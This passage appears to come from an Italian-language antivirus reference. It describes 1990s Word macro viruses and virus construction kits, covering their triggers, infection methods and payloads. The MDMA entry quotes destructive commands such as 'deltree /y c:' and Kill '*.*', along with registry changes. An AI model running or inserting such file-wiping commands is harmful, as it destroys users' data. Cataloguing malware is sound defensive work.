AutoClose Lunghezza della Macro: 517 Byte Paese di origine: ?Russia? Data di origine: Sconosciuta Payload: Si Rilevato In-The-Wild: No Descrizione: Kompu infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono aperti o chiusi. Il giorno 6 ed 8 di ogni mese, Kompu mostra il seguente messaggio: " Tahan kommi!, Mul on paha tuju! " Attende quindi un segnale dall'utente. Per poter chiudere la finestra del messaggio Φ necessario dare l'invio al seguente testo: " komm " Kompu aggiunge inoltre al documento stampato il seguente messaggio: " Naemm-Naemm-Naemm-Naemm-Amps-Amps-Amps- Amps-Kloemps-Kroeoek! " [Word_Lazy.A] Nome del virus: Word.Lazy.A Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoOpen, Lazy Lunghezza della Macro: 664 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: Si Rilevato In-The-Wild: No Descrizione: Lazy infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono anch'essi aperti (AutoOpen). Quando Lazy si attiva (Friday 13th), imposta una password al documento attivo. Se si trova un documento con una password sconosciuta scaricare una copia di WinWord Password Recovery Tool (wwprt). E' disponibile al sito: www.vdsarg.cow. [Word_Lemon.A (aka Melon)] Nome del virus: Word.Lemon.A (aka Melon) Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoOpen, Lemon (Melon) Lunghezza della Macro: 664 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: Si Rilevato In-The-Wild: No Descrizione: Lemon.A infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti Quando vengono anch'essi aperti (AutoOpen). Quando Lemon si attiva (probabilitα di 1/31), compare il seguente messaggio: " !!LEMON!!!!MELON!! " " !!LEMON!!!!MELON!! " [Word_Lemon.B] Nome del virus: Word.Lemon.B Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 577 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: No Rilevato In-The-Wild: No Descrizione: Lemon.B infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti Quando vengono anch'essi aperti (AutoOpen). Lemon.B rimuove "ExtrasMakro" per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). [Word_Lunch.A] Nome del virus: Word.Lunch.A Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: No Nomi delle Macro: AutoOpen (File/Salva), NEWAO, NEWFS Lunghezza della Macro: 1579 Byte nei file .doc, 1718 Byte nel modello di documento principale Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: No Rilevato In-The-Wild: No Descrizione: Lunch infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. La macro "AutoOpen" viene rinominata "File/Salva" quando Lunch infetta il modello di documento principale. Come conseguenza, altri documenti divengono infetti quando sono salvati con il comando File/Salva. Quando un documento infetto viene salvato alle ore 12:01, Lunch mostra il seguente messaggio: " !Whatya doin'here? Take a lunch break! " [Word_Lunch.B] Nome del virus: Word.Lunch.B Tipo di Virus: Virus da macro di Word Numero di Macro: 3 Criptato: No Nomi delle Macro: AutoOpen (File/Salva), NEWAO, NEWFS Lunghezza della Macro: 1375 Byte nei file .doc, 1463 Byte nel modello di documento principale Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: No Rilevato In-The-Wild: No Descrizione: La differenza tra questa nuova versione ed il virus Lunch.A originale Φ che Lunch.B non controlla la presenza delle macro "File/Apri" e "AutoExit". Controlla invece la presenza della macro "File/Salva" prima di infettare il modello di documento principale (normal.dot). Per ulteriori informazioni vedere la descrizione del virus Lunch.A. [Word_Maddog.A] Nome del virus: Word.Maddog.A Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: No Nomi delle Macro: AutoOpen, AutoClose, AutoExec, FileClose, AopnFinish, FcFinish Lunghezza della Macro: 4209 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: MadDog.A infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono aperti e chiusi (FileClose). Alla chiusura di un documento, MadDog.A salva diverse volte "Temp.dot" e quindi salva il documento attivo. Crea inoltre il seguente file nella directory attiva: " Filename.dat " Quando viene chiuso un documento (AutoClose) tra le 8 e le 9 di sera, Maddog.A sostituisce la lettera "e" con la lettera "a". [Word_Maddog.B] Nome del virus: Word.Maddog.B Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: No Nomi delle Macro: AutoOpen, AutoClose, AutoExec, FileClose, AopnFinish, FcFinish Lunghezza della Macro: 4259 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: Si Rilevato In The Wild: Si Descrizione: La differenza tra questa nuova versione ed il virus Maddog.A originale Φ che il codice Φ stato leggermente modificato. MadDog.B infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono aperti e chiusi (FileClose). Alla chiusura di un documento, MadDog.A salva diverse volte "Temp.dot" e quindi salva il documento attivo. Crea inoltre il seguente file nella directory attiva: " Filename.dat " Quando viene chiuso un documento (AutoClose) tra le 8 e le 9 di sera, Maddog.B sostituisce la lettera "e" con la lettera "a". [Word_MDMA.A (a.k.a. StickyKeys, MDMA_DMV)] Nome del virus: Word.MDMA.A (a.k.a. StickyKeys, MDMA_DMV) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoClose Lunghezza della Macro: 1635 Byte Paese di origine: USA Data di origine: Luglio 1996 Distruttivo: Si Rilevato In The Wild: Si Descrizione: MDMA Φ il primo virus da macro che cerca di lavorare su Windows, Windows 95, Macintosh e Windows NT. Pu≥ essere un virus molto distruttivo, si consiglia quindi agli utenti di Word di controllare il proprio sistema con un programma antivirus aggiornato. MDMA infetta il modello di documento principale (normal.dot) quando viene aperto e poi chiuso un documento infetto. Altri documenti sono infettati quando vengono chiusi ("AutoClose"). Se viene caricato un documento infetto il giorno 1di ogni mese, MDMA attiva la sua procedura distruttiva. A causa di un bug nel codice MDMA chiamerα sempre la procedura di Windows 95, anche se vi sono altre procedure per altri sistemi operativi. Tutte le procedure sono: Windows: -------- Kill "c:\shmk."; "deltree /y c:" Φ aggiunta ad autoexec.bat Questa cancella tutte le directory in drive C:\. Windows NT: ----------- Kill "*.*"; Kill "c:\shmk." Questa cancella tutti i file in drive C:\. Macintosh: ---------- Kill MacID$("****") Questa cancella tutti i file nell'hard drive. Windows 95: ----------- Kill "c" \shmk."; Kill "c:\windows\*.hlp"; Kill "c:\windows\system\*.cpl" SetPrivateProfileString ("HKEY_CURRENT_USER\Control Panel\Accessibility\Stickykeys", "On", "1", "") SetPrivateProfileString ("HKEY_LOCAL_MACHINE\Network\Logon","ProcessLoginScript", "00","") SetPrivateProfileString ("HKEY_CURRENT_USER\Control Panel\Accessibility\HighContrst", "On", "1", "") Questa cancella importanti file di Windows. MDMA mostra inoltre il seguente messaggio: " You are infected with MDMA_DMV. Brought to you by MDMA " " (Many Delinquent Modern Anarchists). " [Word_MDMA.B (a.k.a. StickyKeys, MDMA_DMV)] Nome del virus: Word.MDMA.B (a.k.a. StickyKeys, MDMA_DMV) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoClose Lunghezza della Macro: 1635 Byte Paese di origine: USA Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza maggiore tra queste nuove versioni ed il virus MDMA.A Φ che la sua procedura Φ alterata. Microsoft Word non si cura delle macro alterate, perci≥ MDMA.B Φ ancora in grado di replicarsi. MDMA.B infetta il modello di documento principale (normal.dot) quando viene aperto e poi chiuso un documento infetto. Altri documenti sono infettati quando vengono chiusi ("AutoClose"). [Word_MDMA.C (a.k.a. StickyKeys, MDMA_DMV)] Nome del virus: Word.MDMA.C (a.k.a. StickyKeys, MDMA_DMV) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoClose Lunghezza della Macro: 1025 Byte Paese di origine: USA Data di origine: Ottobre 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: La differenza maggiore tra queste nuove versioni ed il virus MDMA.A Φ che il codice risulta parzialmente modificato. MDMA.C infetta il modello di documento principale (normal.dot) quando viene aperto e poi chiuso un documento infetto. Altri documenti sono infettati quando vengono chiusi ("AutoClose"). Alla chiusura di un documento infetto il giorno 20di ogni mese MDMA.C attiva la sua procedura distruttiva. Cerca di infettare i seguenti file: C:\shmk. Tutti i file *.hlp (Help) nella directory C:\Windows Tutti i file *.cpl nella cartella C:\Windows\System MDMA.C possiede inoltre una procedura per Macintosh, che non Φ mai stata eseguita. [Word_MDMA.D (a.k.a. StickyKeys, MDMA_DMV)] Nome del virus: Word.MDMA.D (a.k.a. StickyKeys, MDMA_DMV) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoClose Lunghezza della Macro: 744 Byte Paese di origine: USA Data di origine: Ottobre 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: La differenza maggiore tra questa nuova versione ed il virus MDMA.A Φ la perdita di alcuni codici. MDMA.D infetta il modello di documento principale (normal.dot) quando viene aperto e poi chiuso un documento infetto. Altri documenti sono infettati quando vengono chiusi ("AutoClose"). Mentre MDMA.C cerca di cancellare alcuni file dopo il giorno 20 di ogni mese, MDMA.D non contiene questa procedura distruttiva. Possiede solo una procedura per Macintosh, che non Φ mai stata eseguita. [Word_MDMA.E (a.k.a. StickyKeys, MDMA_DMV)] Nome del virus: Word.MDMA.E (a.k.a. StickyKeys, MDMA_DMV) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoClose Lunghezza della Macro: 735 Byte Paese di origine: USA Data di origine: 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza maggiore tra questa nuova versione ed il virus MDMA.D Φ la perdita di alcuni codici. MDMA.E infetta il modello di documento principale (normal.dot) quando viene aperto e poi chiuso un documento infetto. Altri documenti sono infettati quando vengono chiusi ("AutoClose"). Mentre altre versioni di MDMA contengono procedure distruttive, MDMA.E non cancella nessun file. [Word_Mind.A (aka Puritan)] Nome del virus: Word.Mind.A (aka Puritan) Tipo di Virus: Virus da macro di Word Numero di Macro: 6 or 1 Criptato: No Nomi delle Macro: AOB, FSAB, Retro, Puritan, File/Salva con nome, Strumenti/Macro Lunghezza della Macro: 5415 (Mind.A) o 753 (Mind.A1) Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Mind.A (Mind.A1) Φ un altro virus non in grado di infettare altri documenti. Perci≥ risulta difficile che si possano utilizzare documenti infetti con il virus Mind. [Word_Mota.A] Nome del virus: Word.Mota.A Tipo di Virus: Virus da macro di Word Numero di Macro: 5 Criptato: Si Nomi delle Macro: No2, AutoExec, AutoOpen, File/Esci, File/Salva con nome Lunghezza della Macro: 1578 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Mota infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono salvati (File/Salva con nome). Al "File/Esci", Mota disabilita la protezione anti-virus di Microsoft Word 7.0 ed il messaggio di preavviso prima di salvare il modello di documento principale (normal.dot). Quando Microsoft Word viene avviato (AutoExec) da un modello di documento principale infetto, Mota aggiunge al documento attivo il seguente testo: " Mota grows.. " [Word_Muck.A] Nome del virus: Word.Muck.A Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: No Nomi delle Macro: AutoOpen, AutoNew, AutoClose, AutoExit, File/Salva, File/Salva con nome Lunghezza della Macro: 5329 Byte Paese di origine: Africa Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Muck infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono salvati (File/Salva e File/Salva con nome). Muck Φ un altro virus non distruttivo, mostra solo il messaggio " Muck " con una probabilitα del 20%. Muck contiene inoltre un codice di un inefficace programma antivirus. The Macro "AutoClose", "AutoExit" e "AutoNew" Sono state prese da ScanProt. [Word_Muck.B] Nome del virus: Word.Muck.B Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: No Nomi delle Macro: AutoOpen, AutoNew, AutoClose, AutoExit, File/Salva File/Salva con nome Lunghezza della Macro: 2781 Byte Paese di origine: Africa Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Muck.B infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono salvati (File/Salva e File/Salva con nome). La differenza maggiore tra questa nuova versione ed il virus Muck.A originale Φ che Muck.B prende altre macro dalla soluzione anti-virus della macro di Scan Prot (AutoClose and AutoNew). Muck.B Φ un altro virus non distruttivo, mostra solo il messaggio " Muck " con una probabilitα del 20%. [Word_Muck.C] Nome del virus: Word.Muck.C Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: No Nomi delle Macro: AutoOpen, AutoNew, AutoClose, AutoExit, File/Salva, File/Salva con nome Lunghezza della Macro: 4327 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Muck.C infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono salvati (File/Salva e File/Salva con nome). La differenza maggiore tra questa nuova versione ed il virus Muck.A originale Φ che Muck.C ha trascurabili differenze del codice. Le macro AutoClose e AutoNew sono identiche a quelle trovate nel virus Muck.B. Muck.C Φ un altro virus non distruttivo, mostra solo il messaggio " Muck " con una probabilitα del 20%. [Word_Muck.D] Nome del virus: Word.Muck.D Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: No Nomi delle Macro: AutoOpen, AutoNew, AutoClose, AutoExit, File/Salva, File/Salva con nome Lunghezza della Macro: 1619 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Muck.D infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono salvati (File/Salva e File/Salva con nome). La differenza maggiore tra questa nuova versione ed il virus Muck.A originale Φ che Muck.D ha trascurabili differenze del codice. La macro AutoNew Φ nuova mentre la macro AutoExit proviene dalla versione B. Muck.D esiste anche come virus di Word 97. Fu convertita da una versione pi∙ vecchia di Word (6.0 o 7.0) a Word 8.0! Muck.D Φ un altro virus non distruttivo, mostra solo il messaggio " Muck " con una probabilitα del 20%. [Word_Muck.E] Nome del virus: Word.Muck.E Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: No Nomi delle Macro: AutoOpen, AutoNew, AutoClose, AutoExit, File/Salva, File/Salva con nome Lunghezza della Macro: 1648 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Muck.E infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono salvati (File/Salva e File/Salva con nome). La differenza maggiore tra questa nuova versione ed il virus Muck.A originale Φ che Muck.E ha trascurabili differenze del codice. Muck.E Φ un altro virus non distruttivo, mostra solo il messaggio " Muck " con una probabilitα del 20%. [Word_NF.A (a.k.a. Names)] Nome del virus: Word.NF.A (a.k.a. Names) Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoClose, NF Lunghezza della Macro: 286 Byte Paese di origine: USA Data di origine: Estate 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: NF infetta i documenti che vengono chiusi (AutoClose). I documenti infetti vengono convertiti in file di modello, evenienza molto comune per un virus da macro. All'infezione, NF mostra sullo schermo in basso il seguente messaggio: " Traced! " [Word_Niceday.A] Nome del virus: Word.Niceday.A Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, VOpen, AutoClose Lunghezza della Macro: 886 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: No Rilevato In-The-Wild: No Descrizione: Niceday infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). Niceday si attiva ogni giorno dell'anno e mostra il messaggio: " Have a Nice Day " Niceday comprende parti del virus Concept. La macro "Payload" Φ identica ad una presente nel virus Concept.A. [Word_Niceday.B] Nome del virus: Word.Niceday.B Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Lunghezza della Macro: 886 Byte Paese di origine: Sconosciuto Data di origine: Inverno 1996 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Niceday.B infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). La differenza maggiore tra questa versione ed il virus Niceday.A Φ che Niceday.B possiede dei codici modificati. [Word_Niceday.C] Nome del virus: Word.Niceday.C Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Lunghezza della Macro: 886 Byte Paese di origine: Sconosciuto Data di origine: Inverno 1996 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Niceday.C infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). La differenza maggiore tra questa nuova versione ed il virus Niceday.A Φ che Niceday.C possiede dei codici alterati. [Word_Niceday.D] Nome del virus: Word.Niceday.D Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Lunghezza della Macro: 886 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Niceday.D infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). La differenza maggiore tra questa nuova versione ed il virus Niceday.A Φ che Niceday.D possiede la macro "Payload" alterata. [Word_Niceday.E] Nome del virus: Word.Niceday.E Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Lunghezza della Macro: 886 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Niceday.E infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). La differenza maggiore tra questa nuova versione ed il virus Niceday.A Φ che Niceday.E possiede le macro "Payload" e "AutoExit" alterate. [Word_Niceday.F] Nome del virus: Word.Niceday.F Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Lunghezza della Macro: 886 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: Si Descrizione: Niceday.F infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). La differenza maggiore tra questa nuova versione ed il virus Niceday.A Φ che Niceday.F possiede la macro "AutoExit" alterata diversamente. [Word_Niceday.G] Nome del virus: Word.Niceday.G Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Lunghezza della Macro: 910 Byte Paese di origine: Spagna Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Niceday.G infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). La differenza maggiore tra questa nuova versione ed il precedente Niceday Φ che Niceday.G possiede un messaggio differente. Compare " Pepe Truene, The mooooooooore Faster" al posto di "Have a NiceDay!". Niceday.G possiede un commento addizionale nella macro "AutoClose". [Word_Niceday.H] Nome del virus: Word.Niceday.H Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Lunghezza della Macro: 886 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Niceday.H infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). La differenza maggiore tra questa nuova versione ed i precedenti Niceday Φ che Niceday.H possiede la macro "Payload" alterata diversamente. [Word_Niceday.I] Nome del virus: Word.Niceday.I Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Lunghezza della Macro: 886 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Niceday.I infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). La differenza maggiore tra questa nuova versione ed i precedenti Niceday Φ che Niceday.I possiede delle macro alterate diversamente. [Word_Niceday.J] Nome del virus: Word.Niceday.J Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Lunghezza della Macro: 886 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Niceday.J infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). La differenza maggiore tra questa nuova versione ed i precedenti Niceday Φ che Niceday.J possiede la macro "Payload" alterata diversamente. [Word_Niceday.K] Nome del virus: Word.Niceday.K Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Lunghezza della Macro: 886 Byte Paese di origine: Sconosciuto Data di origine: Giugno 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Niceday.K infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). La differenza maggiore tra questa nuova versione ed i precedenti Niceday Φ che Niceday.K possiede la macro "AutoExit" alterata diversamente. [Word_Niceday.L] Nome del virus: Word.Niceday.L Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: VClose, Payload, AutoExit, AutoOpen, (VOpen, AutoClose) Lunghezza della Macro: 909 Byte Paese di origine: Sconosciuto Data di origine: Giugno 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: Niceday.L infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono chiusi (AutoClose). La differenza maggiore tra questa nuova versione ed i precedenti Niceday Φ che Niceday.L possiede un messaggio diverso. Compare " Your files will be deleted in 24 hours " al posto di " Have a NiceDay!". [Word_Niki.A] Nome del virus: Word.Niki.A Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: Si Nomi delle Macro: AutoExec, AutoOpen, FileApri, FileSalvaConNome, StrumMacro, NiKi Lunghezza della Macro: 7939 Byte Paese di origine: Italia Data di origine: Sconosciuta Distruttivo: Si Rilevato In-The-Wild: No Descrizione: Niki Φ un altro virus da macro per la versione italiana di Microsoft Word. Niki infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (FileApri) e salvati (FileSalvaConNome). Quando la macro "NiKi" viene attivata, Niki cancella tutti i file .doc e i file .dll nelle seguenti directory: C:\MSOFFICE C:\WINDOWS\SYSTEM [Word_Nikita.A and Word.Nikita.A1] Nome del virus: Word.Nikita.A and Word.Nikita.A1 Tipo di Virus: Virus da macro di Word Numero di Macro: 2 o 1 Criptato: Si Nomi delle Macro: AutoOpen, Fun Lunghezza della Macro: 1028 Byte nei file .doc, 309 Byte nel modello di documento principale Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: Si Rilevato In-The-Wild: No Descrizione: Nikita Φ un cavallo di troia, non un virus. Non si replica. Nikita si attiva quando viene aperto un documento infetto. Compare una faccia che muove occhi e bocca, ed il seguente testo: " Hello Guys! Oh, please stay here and look! " (il testo Φ disponibile solo nel documento cavallo di Troia originale) All'attivazione, la macro "Fun" viene salvata nel modello di documento principale sotto il nome "AutoOpen". Una volta che viene aperto un nuovo documento (da un documento infetto) la procedura si attiva e Nikita crea file, riempendo lentamente l'hard drive. I file contengono i seguenti file: " Nikita (1997) Nightmare Joker [SLAM] " [Word_NJ-WMDLK1.A (a.k.a. BlackKnight)] Nome del virus: Word.NJ-WMDLK1.A (a.k.a. BlackKnight) Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: DQEQDIDT, GPDRCQJZ Lunghezza della Macro: 3680 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: No Rilevato In-The-Wild: No Descrizione: NJ-WMDLK1.A infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto e viene premuto il seguente tasto: " SPACE " assegnato alla macro DQEQDIDT Altri documenti divengono infetti quando viene premuto ancora " SPACE ". NJ-WMDLK1.A Φ semplice da individuare. Se viene premuto " SPACE ", apparirα la lettera " E " e quando viene premuto " E ", compare uno spazio vuoto (spacebar function). Questo virus fu distribuito con NJ-WMDLK1.B e NJ-WMDLK1.C nel kit per costruire un virus da macro. Il kit Φ disponibile in 5 diverse versioni ed Φ in grado di creare virus da macro e cavalli di Troia da macro. [Word_NJ-WMDLK1.B (a.k.a. BlackEnd)] Nome del virus: Word.NJ-WMDLK1.B (a.k.a. BlackEnd) Tipo di Virus: Virus da macro di Word Numero di Macro: 5 Criptato: Si Nomi delle Macro: AutoNew, AutoClose, AutoExec, AutoOpen, BlackEnd Lunghezza della Macro: 2102 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Payload: Si Rilevato In-The-Wild: No Descrizione: NJ-WMDLK1.B infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen), chiusi (AutoClose), viene avviato Microsoft Word (AutoExec), e quando viene creato un nuovo file (AutoNew). Il giorno 22 maggio di ogni anno, Nj-WMDLK1.B attiva la sua procedura ed inserisce nel nuovo file di modello il seguente testo: " You are infected with the BlackEbd Virus! [D.K.] Successivamente viene creato e lanciato il seguente: C:\DOSSYS.BAT Il file contiene: " echo off " " doskey Fun=setver win.com 3.00 " " echo off " " Fun " il virus fu distribuito con NJ-WMDLK1.A e NJ-WMDLK1.C nel kit per costruire un virus da macro. Il kit Φ disponibile in 5 diverse versioni ed Φ in grado di creare virus da macro e cavalli di Troia da macro. [Word_NJ-WMVCK2.B (Kit) (a.k.a. NJK-gen)] Virus Kit Name: Word.NJ-WMVCK2.B (Kit) (a.k.a. NJK-gen) Tipo di Virus: Virus da macro di Word Lunghezza della Macro: 264915 Byte Numero di Macro: 20 Paese di origine: Germania Data di origine: Luglio 1996 Descrizione: Questo kit per costruire virus da macro fu il primo a comparire nell'estate del 1996. Fu scritto in Germania e lavora solo con la versione tedesca di Microsoft Word. Tutti i virus creati con il kit possiedono in comune le seguenti caratteristiche: 1. Composti da 7 o 8 macro 2. 7 macro hanno un nome fisso 3. il nome dell'ultima macro Φ scelto dall'utente Il kit offre la possibilitα di inserirsi in 9 predefiniti virus basati sul DOS. A causa di un bug nel codice della macro lavora solo l'inserimento per il virus BOZA.C. Boza.C viene classificato come virus e non infetta i file dell'utente. Tuttavia, il pericolo di una alterazione Φ sempre presente. Tutti i virus controllano l'ora di sistema e se il valore nel campo dei secondi Φ 10, viene aggiunto il seguente testo al documento stampato: " Nightmare Joker's WMVCK " Il kit di costruzione permette anche di aggiungere testo aggiuntivo al documento stampato. L'utente che utilizza il kit deve solo scrivere il testo quando crea il virus. Con il kit si possono creare i seguenti virus: 1. WMVCK.Casino - Questa versione inserisce Casino.2330. 2. WMVCK.VLS - Questa versione inserisce VCL.Markt.1533. 3. WMVCK.MTE - Questa versione inserisce MTE.Shocker. 4. WMVCK.Sirius - Questa versione inserisce Sirius.Alive.4608. 5. WMVCK.SMEG - Questa versione inserisce SMEG.Queeg. 6. WMVCK.Tequila - Questa versione inserisce Tequila. 7. WMVCK.VICE - Questa versione inserisceVICE.05.Code.3952. 8. WMVCK.Uniform - Questa versione inserisce Uniform. 9. WMVCK.Boza.C - Questa versione inserisce Boza. 10. WMVCK.Tremor - Questa versione inserisce Tremor. 11. WMVCK.NoDrop - Questa versione non inserisce virus. [Word_NJ-WMDLK1.C (a.k.a. Grunt)] Nome del virus: Word.NJ-WMDLK1.C (a.k.a. Grunt) Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: XxGRUNTxX1, XxGRUNTxX2 Lunghezza della Macro: 1461 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Distruttivo: No Rilevato In-The-Wild: No Descrizione: NJ-WMDLK1.C infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto e viene premuto uno dei seguenti tasti: " E " assegnato alla macro XxGRUNTxX1 " I " assegnato alla macro XxGRUNTxX2 Altri documenti divengono infetti quando si preme " E " or" I ". Nel virus si pu≥ ritrovare il seguente testo: " A Virus from Nightmare Joker's Demolition Kit! " Il virus fu distribuito con NJ-WMDLK1.A eNJ-WMDLK1.B in un kit di costruzione di virus da macro. Il kit Φ disponibile in 5 diverse versioni ed Φ in 